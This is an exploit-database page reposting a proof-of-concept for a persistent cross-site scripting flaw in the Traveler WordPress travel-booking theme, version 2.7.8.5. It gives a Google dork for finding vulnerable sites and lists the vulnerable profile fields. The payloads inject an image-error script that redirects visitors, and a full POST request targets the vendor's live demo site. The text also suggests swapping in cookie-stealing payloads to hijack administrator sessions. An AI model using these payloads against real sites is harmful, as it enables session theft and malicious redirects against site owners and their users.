Advertisement






Travel Booking WordPress Theme v2.7.8.5 Persistent XSS

CVE Category Price Severity
CVE-2021-24564 CWE-79 $500 Critical
Author Risk Exploitation Type Date
Unknown High Remote 2020-01-11
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N 0.86 0.132

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020010083

Below is a copy:

Travel Booking WordPress Theme v2.7.8.5 Persistent XSS
# Exploit Title: Travel Booking WordPress Theme v2.7.8.5 Persistent XSS
# Google Dork: /wp-content/themes/traveler/
# Date: 11/01/2020
# Exploit Author: m0ze
# Vendor Homepage: https://travelerwp.com/
# Software Link: https://themeforest.net/item/traveler-traveltourbooking-wordpress-theme/10822683
# Version: 2.7.8.5
# Tested on: Kali Linux
# CVE: -
# CWE: 79


----[]- Info: -[]----
Demo website: https://mixmap.travelerwp.com/
PoC Profile: https://mixmap.travelerwp.com/author/m0ze2/


----[]- Persistent XSS -> User Profile: -[]----
Possibility to use any cookie stealing payload to hijack user/administrator session or force redirect to malicious website. Vulnerable input fields: Paypal Email, Phone Number and Home Airport. Vulnerable textarea: About Yourself.

Payload Sample (for input): "><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>
Payload Sample (for textarea): </textarea><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>

PoC:

POST /page-user-setting/?sc=setting&id_user HTTP/1.1
Host: mixmap.travelerwp.com
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------191691572411478
Content-Length: 2210
Origin: https://mixmap.travelerwp.com
Connection: close
Referer: https://mixmap.travelerwp.com/page-user-setting/?sc=setting&id_user
Cookie: _your_cookies_here_
Upgrade-Insecure-Requests: 1

-----------------------------191691572411478
Content-Disposition: form-data; name="st_update_user"

ba1d73a992
-----------------------------191691572411478
Content-Disposition: form-data; name="_wp_http_referer"

/page-user-setting/?sc=setting&id_user
-----------------------------191691572411478
Content-Disposition: form-data; name="id_user"

1672
-----------------------------191691572411478
Content-Disposition: form-data; name="st_paypal_email"

"><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>
-----------------------------191691572411478
Content-Disposition: form-data; name="st_email"

[email protected]
-----------------------------191691572411478
Content-Disposition: form-data; name="st_phone"

"><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>
-----------------------------191691572411478
Content-Disposition: form-data; name="st_bio"

</textarea><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>
-----------------------------191691572411478
Content-Disposition: form-data; name="st_is_check_show_info"

on
-----------------------------191691572411478
Content-Disposition: form-data; name="id_avatar"

10928
-----------------------------191691572411478
Content-Disposition: form-data; name="st_avatar"; filename=""
Content-Type: application/octet-stream


-----------------------------191691572411478
Content-Disposition: form-data; name="st_airport"

"><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>
-----------------------------191691572411478
Content-Disposition: form-data; name="st_province"


-----------------------------191691572411478
Content-Disposition: form-data; name="st_address"


-----------------------------191691572411478
Content-Disposition: form-data; name="st_zip_code"


-----------------------------191691572411478
Content-Disposition: form-data; name="st_city"


-----------------------------191691572411478
Content-Disposition: form-data; name="st_country"


-----------------------------191691572411478
Content-Disposition: form-data; name="st_btn_update"

Save Changes
-----------------------------191691572411478--

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.